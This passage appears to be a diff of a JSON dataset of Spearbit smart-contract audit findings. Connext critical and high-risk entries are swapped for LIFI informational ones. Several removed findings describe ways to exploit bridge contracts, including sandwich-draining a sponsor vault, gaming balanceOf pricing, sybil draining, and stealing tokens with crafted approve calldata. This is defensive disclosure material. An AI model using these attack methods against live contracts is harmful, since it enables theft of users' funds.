function depositAsset(, , isNative ) doesnt check tokenId == NATIVE_ASSETID, although depositAsset(,) does. In the code base depositAsset(, , isNative ) isnt used. function depositAsset( address tokenId, uint256 amount, bool isNative ) internal { if (amount == 0) revert InvalidAmount(); if (isNative) { ... } else { ... } } function depositAsset(address tokenId, uint256 amount) internal { return depositAsset(tokenId, amount, tokenId == NATIVE_ASSETID); }", "labels": [ "Spearbit", - "Connext", - "Severity: Critical Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Use of spot price in SponsorVault leads to sandwich attack.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "There is a special role sponsor in the protocol. Sponsors can cover the liquidity fee and transfer fee for users, making it more favorable for users to migrate to the new chain. Sponsors can either provide liquidity for each adopted token or provide the native token in the SponsorVault. If the native token is provided, the SponsorVault will swap to the adopted token before transferring it to users. contract SponsorVault is ISponsorVault, ReentrancyGuard, Ownable { ... function reimburseLiquidityFees( address _token, uint256 _liquidityFee, address _receiver ) external override onlyConnext returns (uint256) { ... uint256 amountIn = tokenExchange.getInGivenExpectedOut(_token, _liquidityFee); amountIn = currentBalance >= amountIn ? amountIn : currentBalance; // sponsored fee may end being less than _liquidityFee due to slippage sponsoredFee = tokenExchange.swapExactIn{value: amountIn}(_token, msg.sender); ... } } The spot AMM price is used when doing the swap. Attackers can manipulate the value of getInGivenExpectedOut and make SponsorVault sell the native token at a bad price. By executing a sandwich attack the exploiters can drain all native tokens in the sponsor vault. For the sake of the following example, assume that _token is USDC and native token is ETH, the sponsor tries to sponsor 100 usdc to the users: Attacker first manipulates the DEX and makes the exchange of 1 ETH = 0.1 USDC. getInGivenExpectedOut returns 100 / 0.1 = 1000. tokenExchange.swapExactIn buys 100 USDC with 1000 ETH, causing the ETH price to decrease even lower. Attacker buys ETH at a lower prices and realizes a profit.", + "title": "Simplify batchRemoveDex()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The code of batchRemoveDex() is somewhat difficult to understand and thus to maintain. function batchRemoveDex(address[] calldata _dexs) external { ... uint256 jlength = storageDexes.length; for (uint256 i = 0; i < ilength; i++) { ... for (uint256 j = 0; j < jlength; j++) { if (storageDexes[j] == _dexs[i]) { ... // update storageDexes.length; jlength = storageDexes.length; break; } } } }", "labels": [ "Spearbit", - "Connext", - "Severity: Critical Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Configuration is crucial (both Nomad and Connext)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The Connext and Nomad protocol rely heavily on configuration parameters. These parameters are configured during deployment time and are updated afterwards. Configuration errors can have major conse- quences. Examples of important configurations are: BridgeFacet.sol: s.promiseRouter. BridgeFacet.sol: s.connextions. BridgeFacet.sol: s.approvedSequencers. Router.sol: remotes[]. xAppConnectionManager.sol: home . xAppConnectionManager.sol: replicaToDomain[]. xAppConnectionManager.sol: domainToReplica[].", + "title": "Error handing in executeCallAndWithdraw", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "If isContract happens to be false then success is false (as it is initialized as false and not updated) Thus the _withdrawAsset() will never happen. Function withdraw() also exist so this functionality isnt necessary but its more logical to revert earlier. 50 function executeCallAndWithdraw(...) ... { ... bool success; bool isContract = LibAsset.isContract(_callTo); if (isContract) { false // thus is false ,! (success, ) = _callTo.call(_callData); } if (success) { // if this is false, then success stays _withdrawAsset(_assetAddress, _to, _amount); // this never happens if isContract == false } else { revert WithdrawFailed(); } }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Deriving price with balanceOf is dangerous", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "getPriceFromDex derives the price by querying the balance of AMMs pools. function getPriceFromDex(address _tokenAddress) public view returns (uint256) { PriceInfo storage priceInfo = priceRecords[_tokenAddress]; ... uint256 rawTokenAmount = IERC20Extended(priceInfo.token).balanceOf(priceInfo.lpToken); ... uint256 rawBaseTokenAmount = IERC20Extended(priceInfo.baseToken).balanceOf(priceInfo.lpToken); ... } Deriving the price with balanceOf is dangerous as balanceOf may be gamed. Consider univ2 as an example; Exploiters can first send tokens into the pool and pump the price, then absorb the tokens that were previously donated by calling mint.", + "title": "_withdrawAsset() could use LibAsset.transferAsset()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "A large part of the function _withdrawAsset() is very similar to LibAsset.transferAsset(). function _withdrawAsset(...) ... { ... if (_assetAddress == NATIVE_ASSET) { address self = address(this); if (_amount > self.balance) revert NotEnoughBalance(_amount, self.balance); (bool success, ) = payable(sendTo).call{ value: _amount }(\"\"); if (!success) revert WithdrawFailed(); } else { assetBalance = IERC20(_assetAddress).balanceOf(address(this)); if (_amount > assetBalance) revert NotEnoughBalance(_amount, assetBalance); SafeERC20.safeTransfer(IERC20(_assetAddress), sendTo, _amount); } ... }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Routers can sybil attack the sponsor vault to drain funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When funds are bridged from source to destination chain messages must first go through optimistic verification before being executed on the destination BridgeFacet.sol contract. Upon transfer processing the contract checks if the domain is sponsored. If such is the case then the user is reimbursed for both liquidity fees paid when the transfer was initiated and for the fees paid to the relayer during message propagation. There currently isnt any mechanism to detect sybil attacks. Therefore, a router can perform several large value transfers in an effort to drain the sponsor vault of its funds. Because liquidity fees are paid to the router by a user connected to the router, there isnt any value lost in this type of attack.", + "title": "anySwapOut() doesnt lower allowance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function anySwapOut() only seems to work with Anyswap tokens. It burns the received to- kens here: AnyswapV5Router.sol#L334 This burning doesnt use/lower the allowance, so the allowance will stay present. Also see howto: function anySwapOut ==> no need to approve. function _startBridge(...) ... { ... LibAsset.maxApproveERC20(IERC20(underlyingToken), _anyswapData.router, _anyswapData.amount); ... IAnyswapRouter(_anyswapData.router).anySwapOut(...); }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Routers are exposed to extreme slippage if they attempt to repay debt before being reconciled", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When routers are reconciled, the local asset may need to be exchanged for the adopted asset in order to repay the unbacked Aave loan. AssetLogic.swapFromLocalAssetIfNeededForExactOut() takes two key arguments: _amount representing exactly how much of the adopted asset should be received. _maxIn which is used to limit slippage and limit how much of the local asset is used in the swap. Upon failure to swap, the protocol will reset the values for unbacked Aave debt and distribute local tokens to the router. However, if this router partially paid off some of the unbacked Aave debt before being reconciled, _maxIn will diverge from _amount, allowing value to be extracted in the form of slippage. As a result, routers may receive less than the amount of liquidity they initially provided, leading to router insolvency.", + "title": "Anyswap rebrand", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Anyswap is rebranded to Multichain see rebrand.", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Malicious call data can DOS execute", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "An attacker can DOS the executor contract by giving infinite allowance to normal users. Since the executor increases allowance before triggering an external call, the tx will always revert if the allowance is already infinite. 11 function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes ,! memory) { ... if (!isNative && hasValue) { SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); // reverts if set to `infinite` before } ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(...) // can set to `infinite` allowance ... ,! ,! }", + "title": "Check processing of native tokens in AnyswapFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The variable isNative seems to mean a wrapped native token is used (see function _getUnderly- ingToken() ). Currently startBridgeTokensViaAnyswap() skips LibAsset.depositAsset() when isNative == true, but a wrapped native tokens should also be moved via LibAsset.depositAsset(). Also _startBridge() tries to send native tokens with { value: _anyswapData.amount } then isNative == true, but this wouldnt work with wrapped tokens. The Howto seems to indicate an approval (of the wrapped native token) is neccesary. 52 contract AnyswapFacet is ILiFi, SwapperV2, ReentrancyGuard { ,! ,! function startBridgeTokensViaAnyswap(LiFiData calldata _lifiData, AnyswapData calldata _anyswapData) ... { { // Multichain (formerly Anyswap) tokens can wrap other tokens (address underlyingToken, bool isNative) = _getUnderlyingToken(_anyswapData.token, _anyswapData.router); if (!isNative) LibAsset.depositAsset(underlyingToken, _anyswapData.amount); ... } function _getUnderlyingToken(address token, address router) ... { ... if (token == address(0)) revert TokenAddressIsZero(); underlyingToken = IAnyswapToken(token).underlying(); // The native token does not use the standard null address ID isNative = IAnyswapRouter(router).wNATIVE() == underlyingToken; // Some Multichain complying tokens may wrap nothing if (!isNative && underlyingToken == address(0)) { underlyingToken = token; } } function _startBridge(... ) ... { ... if (isNative) { IAnyswapRouter(_anyswapData.router).anySwapOutNative{ value: _anyswapData.amount }(...); // ,! send native tokens } ... } }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "DOS attack on the Nomad Home.sol Contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Upon calling xcall(), a message is dispatched via Nomad. A hash of this message is inserted into the merkle tree and the new root will be added at the end of the queue. Whenever the updater of Home.sol commits to a new root, improperUpdate() will check that the new update is not fraudulent. In doing so, it must iterate through the queue of merkle roots to find the correct committed root. Because anyone can dispatch a message and insert a new root into the queue it is possible to impact the availability of the protocol by preventing honest messages from being included in the updated root. function improperUpdate(..., bytes32 _newRoot, ... ) public notFailed returns (bool) { ... // if the _newRoot is not currently contained in the queue, // slash the Updater and set the contract to FAILED state if (!queue.contains(_newRoot)) { _fail(); ... } ... } function contains(Queue storage _q, bytes32 _item) internal view returns (bool) { for (uint256 i = _q.first; i <= _q.last; i++) { if (_q.queue[i] == _item) { return true; } } return false; }", + "title": "Remove payable in swapAndCompleteBridgeTokensViaStargate()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "There are 2 versions of sgReceive() / completeBridgeTokensViaStargate() which use different locations for nonReentrant The function swapAndCompleteBridgeTokensViaStargate of Executor is payable but doesnt receive native to- kens. 53 contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function sgReceive(...) external { // not payable ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, payable(receiver)); // ,! doesn't send native assets ... } function swapAndCompleteBridgeTokensViaStargate(...) external payable nonReentrant { // is payable if (msg.sender != address(this)) { revert InvalidCaller(); } } }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Upon failing to back unbacked debt _reconcileProcessPortal() will leave the converted asset in the contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When routers front liquidity for the protocols users they are later reconciled once the bridge has optimistically verified transfers from the source chain. Upon being reconciled, the _reconcileProcessPortal() attempts to first pay back Aave debt before distributing the rest back to the router. However, _reconcileProcess- Portal() will not convert the adopted asset back to the local asset in the case where the call to the Aave pool fails. Instead, the function will set amountIn = 0 and continue to distribute the local asset to the router. if (success) { emit AavePortalRepayment(_transferId, adopted, backUnbackedAmount, portalFee); } else { // Reset values s.portalDebt[_transferId] += backUnbackedAmount; s.portalFeeDebt[_transferId] += portalFee; // Decrease the allowance SafeERC20.safeDecreaseAllowance(IERC20(adopted), s.aavePool, totalRepayAmount); // Update the amount repaid to 0, so the amount is credited to the router amountIn = 0; emit AavePortalRepaymentDebt(_transferId, adopted, s.portalDebt[_transferId], s.portalFeeDebt[_transferId]); ,! }", + "title": "Use the same order for inherited contracts.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The inheritance of contract isnt always done in the same order. For code consistency its best to always put them in the same order. contract AmarokFacet contract AnyswapFacet contract ArbitrumBridgeFacet contract CBridgeFacet contract GenericSwapFacet contract GnosisBridgeFacet contract HopFacet contract HyphenFacet contract NXTPFacet contract OmniBridgeFacet contract OptimismBridgeFacet contract PolygonBridgeFacet contract StargateFacet contract GenericBridgeFacet contract WormholeFacet contract AcrossFacet contract Executor is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, ReentrancyGuard { is ILiFi, ReentrancyGuard, Swapper { is ILiFi, ReentrancyGuard, SwapperV2 { is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi {", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "_handleExecuteTransaction() doesnt handle native assets correctly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function _handleExecuteTransaction() sends any native tokens to the executor contract first, and then calls s.executor.execute(). This means that within that function msg.value will always be 0. So the associated logic that uses msg.value doesnt work as expected and the function doesnt handle native assets correctly. Note: also see issue \"Executor reverts on receiving native tokens from BridgeFacet\" contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(...)... { ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); (bool success, bytes memory returnData) = s.executor.execute(...); // no native tokens send } } contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ,! ... if (isNative && msg.value != _args.amount) { // msg.value is always 0 ... } } }", + "title": "Catch potential revert in swapAndStartBridgeTokensViaStargate()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The following statement nativeFee -= _swapData[i].fromAmount; can revert in the swapAnd- StartBridgeTokensViaStargate(). function swapAndStartBridgeTokensViaStargate(...) ... { ... for (uint8 i = 0; i < _swapData.length; i++) { if (LibAsset.isNativeAsset(_swapData[i].sendingAssetId)) { nativeFee -= _swapData[i].fromAmount; // can revert } } ... }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Add checks to xcall()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function xcall() does some sanity checks, nevertheless more checks should be added to prevent issues later on in the use of the protocol. If _args.recovery== 0 then _sendToRecovery() will send funds to the 0 address, effectively losing them. If _params.agent == 0 the forceReceiveLocal cant be used and funds might be locked forever. The _args.params.destinationDomain should never be s.domain, although this is also implicitly checked via _mustHaveRemote() assuming a correct configuration. If _args.params.slippageTol is set to something greater than s.LIQUIDITY_FEE_DENOMINATOR then funds can be locked as xcall() allows for the user to provide the local asset, avoiding any swap while _handleExecuteLiquid- ity() in execute() may attempt to perform a swap on the destination chain. function xcall(XCallArgs calldata _args) external payable nonReentrant whenNotPaused returns (bytes32) { // Sanity checks. ... } 14", + "title": "No need to use library If It is in the same file", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "On the LibAsset, some of the functions are called through LibAsset., however there is no need to call because the functions are in the same solidity file. ... ... if (msg.value != 0) revert NativeValueWithERC(); uint256 _fromTokenBalance = LibAsset.getOwnBalance(tokenId); LibAsset.transferFromERC20(tokenId, msg.sender, address(this), amount); if (LibAsset.getOwnBalance(tokenId) - _fromTokenBalance != amount) revert InvalidAmount();", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Executor and AssetLogic deals with the native tokens inconsistently that breaks execute()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When dealing with an external callee the BridgeFacet will transfer liquidity to the Executor before calling Executor.execute. In order to send the native token: The Executor checks for _args.assetId == address(0). AssetLogic.transferAssetFromContract() disallows address(0). Note: also see issue Executor reverts on receiving native tokens from BridgeFacet. 15 contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction() ...{ ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); // _asset may not ,! be 0 (bool success, bytes memory returnData) = s.executor.execute( IExecutor.ExecutorArgs( // assetId parameter from ExecutorArgs // must be 0 for Native asset ... _asset, ... ) ); ... } } library AssetLogic { function transferAssetFromContract( address _assetId, ... ) { ... // No native assets should ever be stored on this contract if (_assetId == address(0)) revert AssetLogic__transferAssetFromContract_notNative(); if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } } } contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ,! ... bool isNative = _args.assetId == address(0); ... } } The BridgeFacet cannot handle external callees when using native tokens.", + "title": "Combined Optimism and Synthetix bridge", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The Optimism bridge also includes a specific bridge for Synthetix tokens. Perhaps it is more clear to have a seperate Facet for this. function _startBridge(...) ... { ... if (_bridgeData.isSynthetix) { bridge.depositTo(_bridgeData.receiver, _amount); } else { ... } }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Executor reverts on receiving native tokens from BridgeFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When doing an external call in execute(), the BridgeFacet provides liquidity into the Executor contract before calling Executor.execute. The BridgeFacet transfers native token when address(wrapper) is provided. The Executor however does not have a fallback/ receive function. Hence, the transaction will revert when the BridgeFacet tries to send the native token to the Executor contract. function _handleExecuteTransaction( ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); (bool success, bytes memory returnData) = s.executor.execute(...); ... } function transferAssetFromContract(...) ... { ... if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } else { ... } }", + "title": "Doublecheck the Diamond pattern", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The LiFi protocol uses the diamond pattern. This pattern is relative complex and has overhead for the delegatecall. There is not much synergy between the different bridges (except for access controls & white lists). By combining all the bridges in one contract, the risk of one bridge might have an influence on another bridge.", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "SponsorVault sponsors full transfer amount in reimburseLiquidityFees()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The BridgeFacet passes args.amount as _liquidityFee when calling reimburseLiquidityFees. Instead of sponsoring liquidityFee, the sponsor vault would sponsor full transfer amount to the reciever. Note: Luckily the amount in reimburseLiquidityFees is capped by relayerFeeCap. function _handleExecuteTransaction(...) ... { ... (bool success, bytes memory data) = address(s.sponsorVault).call( abi.encodeWithSelector(s.sponsorVault.reimburseLiquidityFees.selector, _asset, _args.amount, _args.params.to) ); ,! } 17", + "title": "Reference Diamond standard", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The LiFiDiamond.sol contract doesnt contain a reference to the Diamond contract. Having that would make it easier for readers of the code to find the origin of the contract.", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Tokens can get stuck in Executor contract if the destination doesnt claim them all", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function execute() increases allowance and then calls the recipient (_args.to). When the recipient does not use all tokens, these could remain stuck inside the Executor contract. Note: the executor can have excess tokens, see: kovan executor. Note: see issue \"Malicious call data can DOS execute or steal unclaimed tokens in the Executor contract\". function execute(...) ... { ... if (!isNative && hasValue) { SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); } ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, ... ); ... }", + "title": "Validate Nxtp InvariantTransactionData", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "During the code review, It has been noticed that InvariantTransactionDatas fields are not validated. Even if the validation located in the router, sendingChainFallback and receivingAddress parameters are sensible and connext does not have meaningful error message on these parameter validation. Also, router parameter does not have any validation. Most of the other facets have. For instance : Amarok Facet Note: also see issue \"Hardcode bridge addresses via immutable\" function _startBridge(NXTPData memory _nxtpData) private returns (bytes32) { ITransactionManager txManager = ITransactionManager(_nxtpData.nxtpTxManager); IERC20 sendingAssetId = IERC20(_nxtpData.invariantData.sendingAssetId); // Give Connext approval to bridge tokens LibAsset.maxApproveERC20(IERC20(sendingAssetId), _nxtpData.nxtpTxManager, _nxtpData.amount); uint256 value = LibAsset.isNativeAsset(address(sendingAssetId)) ? _nxtpData.amount : 0; // Initiate bridge transaction on sending chain ITransactionManager.TransactionData memory result = txManager.prepare{ value: value }( ITransactionManager.PrepareArgs( _nxtpData.invariantData, _nxtpData.amount, _nxtpData.expiry, _nxtpData.encryptedCallData, _nxtpData.encodedBid, _nxtpData.bidSignature, _nxtpData.encodedMeta ) ); return result.transactionId; }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "reimburseLiquidityFees send tokens twice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function reimburseLiquidityFees() is called from the BridgeFacet, making the msg.sender within this function to be BridgeFacet. When using tokenExchanges via swapExactIn() tokens are sent to msg.sender, which is the BridgeFacet. Then, tokens are sent again to msg.sender via safeTransfer(), which is also the BridgeFacet. Therefore, tokens end up being sent to the BridgeFacet twice. Note: the check ...balanceOf(...) != starting + sponsored should fail too. Note: The fix in C4 seems to introduce this issue: code4rena-246 18 contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(... ) ... { ... uint256 starting = IERC20(_asset).balanceOf(address(this)); ... (bool success, bytes memory data) = address(s.sponsorVault).call( abi.encodeWithSelector(s.sponsorVault.reimburseLiquidityFees.selector, _asset, _args.amount, ,! _args.params.to) ); if (success) { uint256 sponsored = abi.decode(data, (uint256)); // Validate correct amounts are transferred if (IERC20(_asset).balanceOf(address(this)) != starting + sponsored) { // this should revert BridgeFacet__handleExecuteTransaction_invalidSponsoredAmount(); ,! fail now } ... } ... } } contract SponsorVault is ISponsorVault, ReentrancyGuard, Ownable { function reimburseLiquidityFees(... ) { if (address(tokenExchanges[_token]) != address(0)) { ... sponsoredFee = tokenExchange.swapExactIn{value: amountIn}(_token, msg.sender); // send to ,! msg.sender } else { ... } ... IERC20(_token).safeTransfer(msg.sender, sponsoredFee); // send again to msg.sender } } interface ITokenExchange { /** * @notice Swaps the exact amount of native token being sent for a given token. * @param token The token to receive * @param recipient The recipient of the token * @return The amount of tokens resulting from the swap */ function swapExactIn(address token, address recipient) external payable returns (uint256); }", + "title": "Executor contract should not handle cross-chain swap from Connext", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The Executor contract is designed to handle a swap at the destination chain. The LIFI protocol may build a cross-chain transaction to call Executor.swapAndCompleteBridgeTokens at the destination chain. In order to do a flexible swap, the Executor can perform arbitrary execution. Executor.sol#L323-L333 57 function _executeSwaps( LiFiData memory _lifiData, LibSwap.SwapData[] calldata _swapData, address payable _receiver ) private noLeftovers(_swapData, _receiver) { for (uint256 i = 0; i < _swapData.length; i++) { if (_swapData[i].callTo == address(erc20Proxy)) revert UnAuthorized(); // Prevent calling ,! ERC20 Proxy directly LibSwap.SwapData calldata currentSwapData = _swapData[i]; LibSwap.swap(_lifiData.transactionId, currentSwapData); } } However, the receiver address is a privileged address in some bridging services. Allowing users to do arbitrary execution/ external calls is dangerous. The Connext protocol is an example : Connext contractAPI#cancel The receiver address can prematurely cancel a cross-chain transaction. When a cross-chain execution is canceled, the funds would be sent to the fallback address without executing the external call. Exploiters can front-run a gelato relayer and cancel a cross-chain execution. The (post-swap) tokens will be sent to the receivers address. The exploiters can grab the tokens left in the Executor in the same transaction.", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Anyone can repay the portalDebt with different tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Routers can provide liquidity in the protocol to improve the UX of cross-chain transfers. Liquidity is sent to users under the routers consent before the cross-chain message is settled on the optimistic message protocol, i.e., Nomad. The router can also borrow liquidity from AAVE if the router does not have enough of it. It is the routers responsibility to repay the debt to AAVE. contract PortalFacet is BaseConnextFacet { function repayAavePortalFor( address _adopted, uint256 _backingAmount, uint256 _feeAmount, bytes32 _transferId ) external payable { address adopted = _adopted == address(0) ? address(s.wrapper) : _adopted; ... // Transfer funds to the contract uint256 total = _backingAmount + _feeAmount; if (total == 0) revert PortalFacet__repayAavePortalFor_zeroAmount(); (, uint256 amount) = AssetLogic.handleIncomingAsset(_adopted, total, 0); ... // repay the loan _backLoan(adopted, _backingAmount, _feeAmount, _transferId); } } The PortalFacet does not check whether _adopted is the correct token in debt. Assume that the protocol borrows ETH for the current _transferId, therefore Router should repay ETH to clear the debt. However, the Router can provide any valid tokens, e.g. DAI, USDC, to clear the debt. This results in the insolvency of the protocol. Note: a similar issue is also present in repayAavePortal().", + "title": "Avoid using strings in the interface of the Axelar Facet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The Axelar Facet uses strings to indicate the destinationChain, destinationAddress, which is different then on other bridge facets. function executeCallWithTokenViaAxelar( string memory destinationChain, string memory destinationAddress, string memory symbol, ... ) ...{ } The contract address is (or at least can be) encoded as a hex string, as seen in this example: /// https://etherscan.io/tx/0x7477d550f0948b0933cf443e9c972005f142dfc5ef720c3a3324cefdc40ecfa2 # 0 1 2 3 4 Type Name destinationChain string destinationContractAddress payload symbol amount bytes string uint256 50000000 0xA57ADCE1d2fE72949E4308867D894CD7E7DE0ef2 Data binance string USDC 58 The Axelar bridge allows bridging to non EVM chains, however the LiFi protocol doesnt seem to support thus. So its good to prevent accidentally sending to non EVM chains. Here are the supported non EVM chains: non-evm- networks The Axelar interface doesnt have a (compatible) emit.", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Malicious call data can steal unclaimed tokens in the Executor contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Users can provide a destination contract args.to and arbitrary data _args.callData when doing a cross-chain transfer. The protocol will provide the allowance to the callee contract and triggers the function call through ExcessivelySafeCall.excessivelySafeCall. 20 contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ,! ... SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); ... // Try to execute the callData // the low level call will return `false` if its execution reverts (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, gas, isNative ? _args.amount : 0, MAX_COPY, _args.callData ); ... } } Since there arent restrictions on the destination contract and calldata, exploiters can steal the tokens from the executor. Note: the executor does have excess tokens, see: see: kovan executor. Note: see issue Tokens can get stuck in Executor contract. Tokens can be stolen by granting an allowance. Setting calldata = abi.encodeWithSelector(ERC20.approve.selector, exploiter, type(uint256).max); and args.to = tokenAddress allows the exploiter to get an infinite allowance of any token, effectively stealing any unclaimed tokens left in the executor.", + "title": "Hardcode source Nomad domain ID via immutable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "AmarokFacet takes source domain ID as a user parameter and passes it to the bridge: originDomain: _bridgeData.srcChainDomain User provided can be incorrect, and Connext will later revert the transaction. See BridgeFacet.sol#L319-L321: if (_args.params.originDomain != s.domain) { revert BridgeFacet__xcall_wrongDomain(); }", "labels": [ "Spearbit", - "Connext", - "Severity: High Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Fee-On-Transfer tokens are not explicitly denied in swap()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The swap() function is used extensively within the Connext protocol, primarily when swapping be- tween local and adopted assets. When a swap is performed, the function will check the actual amount transferred. However, this is not consistent with 